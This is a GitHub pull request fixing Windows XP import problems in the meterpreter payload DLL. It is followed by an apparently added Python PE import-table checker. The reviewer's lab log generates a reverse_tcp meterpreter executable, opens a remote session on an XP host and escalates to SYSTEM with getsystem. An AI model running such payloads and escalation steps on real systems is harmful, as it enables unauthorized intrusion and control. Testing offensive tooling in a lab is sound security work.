
GetThreadId/OpenThreadToken not available in kernel32 in Windows XP sp2/sp3 with MingW #712

Merged
merged 5 commits into from
Sep 19, 2024

Conversation

@wolfcod wolfcod commented Aug 12, 2024

This patch fixes two issues on Windows XP:

  1. GetThreadId is not available on Windows XP sp2/sp3 (according to MSDN, it's present only from NT 5.2).
  2. OpenThreadToken is present in ADVAPI32.dll as an API, but the same API is available in kernel32 in mingw-x86, which doesn't reflect the exported symbols of kernel32 on XP.

@wolfcod wolfcod changed the title Resolve GetThreadId at runtime GetThreadId/OpenThreadToken not available in kernel32 in Windows XP sp2/sp3 with MingW Aug 13, 2024
@dledda-r7 dledda-r7 self-assigned this Aug 14, 2024

@dledda-r7 dledda-r7 left a comment

Changes look good to me.

Before

┌──(kali㉿kali)-[~/…/metasploit-payloads/c/meterpreter/output]
└─$ r2 metsrv.x86.dll           
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
[0x6ad013b0]> ii |grep ThreadToken
45  0x6ad264f8 NONE FUNC KERNEL32.dll OpenThreadToken
[0x6ad013b0]> 
msf6 payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] Sending stage (490769 bytes) to 172.20.133.167
[*] 172.20.133.167 - Meterpreter session 2 closed.  Reason: Died

After

┌──(kali㉿kali)-[~/…/metasploit-payloads/c/meterpreter/output]
└─$ r2 metsrv.x86.dll
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
[0x6ad013b0]> ii |grep ThreadToken
17  0x6ad26428 NONE FUNC ADVAPI32.dll OpenThreadToken
[0x6ad013b0]> 
msf6 payload(windows/meterpreter/reverse_tcp) > generate -f exe -o ~/Documents/github/pr/712/shell.exe
[*] Writing 73802 bytes to ~/Documents/github/pr/712/shell.exe...
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 0
msf6 payload(windows/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 172.20.129.76:4444 
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (490769 bytes) to 172.20.133.167
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 1 opened (172.20.129.76:4444 -> 172.20.133.167:1045) at 2024-09-18 09:55:42 -0400

msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : USER-B1692D6A4F
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: USER-B1692D6A4F\User
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Thanks a lot @wolfcod for the PR!
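The check the reviewer ran with r2 (`ii | grep ThreadToken`) can be automated for both problems the PR description lists: an `OpenThreadToken` import bound to kernel32 instead of advapi32, and a static `GetThreadId` import that XP cannot satisfy. Below is an added, stdlib-only import-table walker (not part of this PR or the metasploit-payloads code) plus a constructed PE32 sample so it runs without a real metsrv build; the `xp_import_problems` function and the sample layout are assumptions of this example. It handles PE32+ thunks as well, which goes beyond the x86 DLL discussed here.

```python
import struct

def build_sample_pe(imports):
    # Constructed PE32 with one .idata section at RVA 0x1000 / file offset 0x200 (not a real build).
    rva, descs, body = 0x1000, [], bytearray(20 * (len(imports) + 1))  # descriptors + null terminator
    for dll, funcs in imports.items():
        thunks, name_rva = [], rva + len(body); body += dll.encode() + b'\0'
        for f in funcs:  # IMAGE_IMPORT_BY_NAME: 2-byte hint, then the NUL-terminated name
            thunks.append(rva + len(body)); body += b'\0\0' + f.encode() + b'\0'
        body += b'\0' * (-len(body) % 4)
        table = struct.pack('<%dI' % (len(thunks) + 1), *thunks, 0)
        int_rva, iat_rva = rva + len(body), rva + len(body) + len(table)
        body += table + table  # import name table, then the (unbound, so identical) IAT
        descs.append(struct.pack('<5I', int_rva, 0, 0, name_rva, iat_rva))
    body[:20 * len(descs)] = b''.join(descs)
    opt = struct.pack('<H90xI8xII112x', 0x10b, 16, rva, 20 * len(descs) + 20)  # PE32 magic, 16 dirs, import dir
    hdr = (b'MZ' + struct.pack('<58xI', 0x40) + b'PE\0\0' + struct.pack('<HHIIIHH', 0x14c, 1, 0, 0, 0, len(opt), 0x2102)
           + opt + struct.pack('<8s6I2HI', b'.idata', len(body), rva, len(body), 0x200, 0, 0, 0, 0, 0x40000040))
    return bytes(hdr.ljust(0x200, b'\0') + body)

def imports_by_function(pe):
    """Map each function named in the import directory to the DLL it is imported from."""
    nt = struct.unpack_from('<I', pe, 0x3c)[0]
    assert pe[nt:nt + 4] == b'PE\0\0', 'not a PE image'
    nsec, _, _, _, opt_size = struct.unpack_from('<HIIIH', pe, nt + 6)
    opt, pe32 = nt + 24, struct.unpack_from('<H', pe, nt + 24)[0] == 0x10b  # else PE32+, 8-byte thunks
    imp_rva = struct.unpack_from('<I', pe, opt + (96 if pe32 else 112) + 8)[0]  # DataDirectory[1]
    sections = [struct.unpack_from('<8s4I', pe, opt + opt_size + 40 * i) for i in range(nsec)]
    def off(r):  # RVA -> file offset through the section table
        return next(r - va + ptr for _, vs, va, rs, ptr in sections if va <= r < va + max(vs, rs))
    cstr = lambda o: pe[o:pe.index(b'\0', o)].decode()
    fmt, width = ('<I', 4) if pe32 else ('<Q', 8)
    result, desc = {}, off(imp_rva) if imp_rva else None
    while desc is not None and (d := struct.unpack_from('<5I', pe, desc))[3]:  # Name == 0 ends the table
        dll, thunk = cstr(off(d[3])).lower(), off(d[0] or d[4])  # OriginalFirstThunk, else FirstThunk
        while entry := struct.unpack_from(fmt, pe, thunk)[0]:
            if not entry >> (width * 8 - 1):        # high bit set: imported by ordinal, no name
                result[cstr(off(entry) + 2)] = dll  # skip the 2-byte hint
            thunk += width
        desc += 20
    return result

def xp_import_problems(pe):
    """Flag the two defects this PR fixes, as they appear in a built DLL's import table."""
    imp, problems = imports_by_function(pe), []
    if imp.get('OpenThreadToken') not in (None, 'advapi32.dll'):
        problems.append('OpenThreadToken imported from %s; XP exports it from advapi32.dll' % imp['OpenThreadToken'])
    if 'GetThreadId' in imp:
        problems.append('GetThreadId imported statically; it is absent before NT 5.2, resolve it at runtime')
    return problems
```

Run `xp_import_problems(open('metsrv.x86.dll', 'rb').read())` against a fresh build; an empty list matches the "After" state shown above, and a non-empty one reproduces the "Before" state without loading the DLL on an XP box.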
